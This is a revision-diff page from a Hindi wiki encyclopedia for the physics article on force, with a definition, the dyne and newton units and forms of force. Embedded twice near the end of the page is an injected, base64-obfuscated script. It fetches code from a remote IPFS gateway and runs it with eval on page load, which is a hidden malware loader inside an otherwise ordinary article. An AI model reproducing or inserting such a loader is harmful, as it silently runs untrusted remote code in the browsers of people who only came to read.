Difference between revisions of "बल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
{{बहुविकल्प|बहुविकल्पी शब्द=बल|लेख का नाम=बल (बहुविकल्पी)}}
 +
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Force) बल वह धक्का या खिंचाव है जो एक वस्तु द्वारा दूसरी वस्तु पर आरोपित किया जाता है। इसे प्रदर्शित करने के लिये परिणाम व दिशा दोनों की आवश्यकता पड़ती है अतः यह एक [[सदिश राशि]] है। बल के [[मात्रक]]-
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Force) बल वह धक्का या खिंचाव है जो एक वस्तु द्वारा दूसरी वस्तु पर आरोपित किया जाता है। इसे प्रदर्शित करने के लिये परिणाम व दिशा दोनों की आवश्यकता पड़ती है अतः यह एक [[सदिश राशि]] है। बल के [[मात्रक]]-
 
<poem>'''डाइन'''—'सेण्टीमीटर–ग्राम–सेकेण्ड' में बल का मात्रक '''डाइन''' (Dyne) कहलाता है।
 
<poem>'''डाइन'''—'सेण्टीमीटर–ग्राम–सेकेण्ड' में बल का मात्रक '''डाइन''' (Dyne) कहलाता है।
Line 8: Line 10:
 
बल के अनेक रूप हैं। आकर्षण, विकर्षण, कर्षण, आधक्कन, तनाव, [[दाब]] आदि बल के ही रूप हैं।
 
बल के अनेक रूप हैं। आकर्षण, विकर्षण, कर्षण, आधक्कन, तनाव, [[दाब]] आदि बल के ही रूप हैं।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 16: Line 17:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{भौतिक विज्ञान}}
 
[[Category:भौतिक विज्ञान]]
 
[[Category:भौतिक विज्ञान]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:47, 26 May 2016

chitr:Disamb2.jpg bal ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- bal (bahuvikalpi)

(aangrezi:Force) bal vah dhakka ya khianchav hai jo ek vastu dvara doosari vastu par aropit kiya jata hai. ise pradarshit karane ke liye parinam v disha donoan ki avashyakata p dati hai atah yah ek sadish rashi hai. bal ke matrak-

dain—'sentimitar–gram–sekend' mean bal ka matrak dain (Dyne) kahalata hai.
1 dain = 1 gram–semi./sekend2
nyootan—'mitar–kigra. sekend' paddhati (SI paddhati) mean bal ka matrak nyootan (Newton) kahalata hai.
1 nyootan = 1 kigra.–mitar/sekend2
1 nyootan = 105 dain

bal ke anek roop haian. akarshan, vikarshan, karshan, adhakkan, tanav, dab adi bal ke hi roop haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>